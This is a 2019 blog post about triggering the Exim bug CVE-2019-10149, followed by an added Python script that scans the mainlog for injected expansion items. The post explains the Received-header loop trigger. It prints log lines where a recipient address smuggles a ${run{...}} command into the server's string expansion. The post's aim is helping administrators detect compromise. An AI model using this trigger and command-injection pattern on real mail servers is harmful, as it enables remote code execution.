Tuesday, 11 June 2019

(ENG) Emacs through sendmail - exploiting CVE-2019-10149

As an exception, this text is in English.

  Before you start reading, please read the article on LWN, if you have not already done so. The 24-hour mark described in that article passed a long time ago, and still no further details have been published. As stated there, the vulnerability is trivially exploitable, but discovering it in the actual code is not necessarily so. I believe that because of its simplicity an actual exploit is in active use, while the indicators of compromise are unknown to system administrators. This leads to a situation where, after patching your services, you don't know whether your systems have been compromised or not. These are the reasons why I decided to post some further details about this vulnerability.

  As appears from the published information, to trigger the bug we need to set the process_recipients variable to some value other than RECIP_ACCEPT. That happens earlier in the deliver_message() function, in the following code:
else if (received_count > received_headers_max)
  process_recipients = RECIP_FAIL_LOOP;

So it is only a matter of sending more Received headers than the configured limit:
# exim -bP received_headers_max
received_headers_max = 30

Bringing it all together, a successful attack leaves traces that look similar to those below, taken from my Exim mainlog:
1hbNcz-0001gv-Cm <= adrb@localhost H=localhost [::1] P=esmtp S=1732
1hbNcz-0001gv-Cm ** ${run{\x2fbin\x2ftouch\x20\x2ftmp\x2ftest}}@localhost: Too many "Received" headers - suspected mail loop
1hbNdK-0001l5-89 <= <> R=1hbNcz-0001gv-Cm U=Debian-exim P=local S=2969
1hbNcz-0001gv-Cm Completed
1hbNdK-0001l5-89 => adrb R=local_user T=mail_spool 
1hbNdK-0001l5-89 Completed
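As an added example (not code from the post), here is a small Python filter a system administrator could run over Exim's mainlog to surface exactly the kind of trace shown above: any address field that carries an Exim expansion item (`${`), with the `\xNN` escapes decoded so the attempted command is readable. The log sample is constructed from the lines above plus one benign delivery line.

```python
import re

# Constructed sample of Exim mainlog lines: the first four are the traces
# quoted in the post, the last is a constructed benign delivery so the
# filter has something to ignore. A raw string keeps the \x escapes literal.
SAMPLE_MAINLOG = r"""
1hbNcz-0001gv-Cm <= adrb@localhost H=localhost [::1] P=esmtp S=1732
1hbNcz-0001gv-Cm ** ${run{\x2fbin\x2ftouch\x20\x2ftmp\x2ftest}}@localhost: Too many "Received" headers - suspected mail loop
1hbNdK-0001l5-89 <= <> R=1hbNcz-0001gv-Cm U=Debian-exim P=local S=2969
1hbNcz-0001gv-Cm Completed
1hbNdq-0001m2-Qx => bob R=local_user T=mail_spool
"""

# <msgid> <flag> <address> ...  The flags are Exim's arrival, delivery,
# failure and defer markers; the address is the first whitespace-free token
# after the flag (which is why the trace above encodes its space as \x20).
LOG_LINE = re.compile(
    r"^(?P<msgid>\S{6}-\S{6}-\S{2}) (?P<flag><=|=>|->|\*\*|==) (?P<addr>\S+)"
)
EXPANSION_MARKER = "${"
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def decode_exim_escapes(s: str) -> str:
    """Turn the backslash-x hex escapes that Exim's string expansion accepts
    back into characters, so the analyst sees what was meant to run."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)


def find_expansion_attempts(log_text: str) -> list:
    """Return every mainlog entry whose address field contains an Exim
    expansion item. A legitimate address never contains '${'."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m or EXPANSION_MARKER not in m.group("addr"):
            continue
        addr = m.group("addr").rstrip(":")
        hits.append({
            "msgid": m.group("msgid"),
            "flag": m.group("flag"),
            "address": addr,
            "decoded": decode_exim_escapes(addr),
            # the trigger described in the post: loop check fired on an
            # expansion item smuggled in as the recipient
            "loop_trigger": 'Too many "Received" headers' in line,
        })
    return hits


if __name__ == "__main__":
    for hit in find_expansion_attempts(SAMPLE_MAINLOG):
        print(hit["msgid"], hit["flag"], hit["decoded"], "loop_trigger=%s" % hit["loop_trigger"])
```

Feed it your real mainlog with `find_expansion_attempts(open("/var/log/exim4/mainlog").read())`; the path is an assumption and varies by distribution.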

Update: You can read the full details of this vulnerability here